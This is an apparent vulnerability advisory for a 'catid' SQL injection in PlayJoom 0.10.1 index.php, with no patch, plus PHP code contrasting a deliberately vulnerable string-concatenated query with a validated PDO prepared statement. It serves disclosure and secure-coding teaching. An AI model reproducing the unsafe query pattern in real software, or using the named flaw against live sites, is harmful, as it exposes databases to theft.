Vendor: PlayJoom
By: Ihsan Sencan
CVSS: 7.5 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: PlayJoom
Affected Version From: 0.10.1
Affected Version To: 0.10.1
Patch Exists: NO
Related CWE: N/A
CPE: a:playjoom:playjoom:0.10.1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2018
PlayJoom 0.10.1 – ‘catid’ SQL Injection
PlayJoom is vulnerable to SQL injection. An attacker can send a specially crafted HTTP request to the application that executes arbitrary SQL commands in the back-end database: the 'catid' parameter of the 'index.php' script is incorporated into a SQL query without sanitization, so arbitrary SQL code injected into that parameter alters the query. Successful exploitation discloses the contents of the back-end database.
Mitigation:
Input validation should be applied to the 'catid' parameter, and the application should use parameterized queries so that user-supplied values are bound as data rather than interpolated into SQL text.
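The following PHP snippet is an added illustration of the mitigation above; it is not PlayJoom's own code and does not reproduce the affected query. It contrasts the vulnerable pattern (a request parameter concatenated into SQL) with the hardened form (integer validation plus a PDO prepared statement). The table name `categories`, the column names, and the function names are placeholders.

```php
<?php
// Added illustration, not PlayJoom's code. Table/column names are placeholders.

// VULNERABLE PATTERN: the 'catid' request parameter is concatenated straight
// into the SQL statement, so whatever the client sends becomes SQL text.
function findCategoryUnsafe(PDO $db, array $request): array
{
    $catid = $request['catid'] ?? '';
    $sql = "SELECT id, title FROM categories WHERE id = " . $catid;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED PATTERN: validate the parameter first, then bind it as a typed
// value so the database engine never parses it as part of the query.
function findCategorySafe(PDO $db, array $request): array
{
    $raw = $request['catid'] ?? '';

    // 1. Input validation: catid must be a non-negative integer string.
    //    is_string() also rejects array-valued parameters (catid[]=...).
    if (!is_string($raw) || !ctype_digit($raw)) {
        http_response_code(400);
        return [];
    }
    $catid = (int) $raw;

    // 2. Parameterized query: the placeholder is bound, not interpolated.
    $stmt = $db->prepare('SELECT id, title FROM categories WHERE id = :catid');
    $stmt->bindValue(':catid', $catid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage (DSN and credentials are assumed to come from the application config):
// $db = new PDO($dsn, $user, $pass, [
//     PDO::ATTR_EMULATE_PREPARES => false,          // real server-side prepares
//     PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
// ]);
// $rows = findCategorySafe($db, $_GET);
```

Disabling `PDO::ATTR_EMULATE_PREPARES` makes the driver send the statement and the bound value separately to the server instead of building the SQL string client-side, which is the property that makes the parameterized form immune to injection. The validation step is still worthwhile on top of binding: it rejects malformed input early and gives a clean 400 response that can be logged and alerted on.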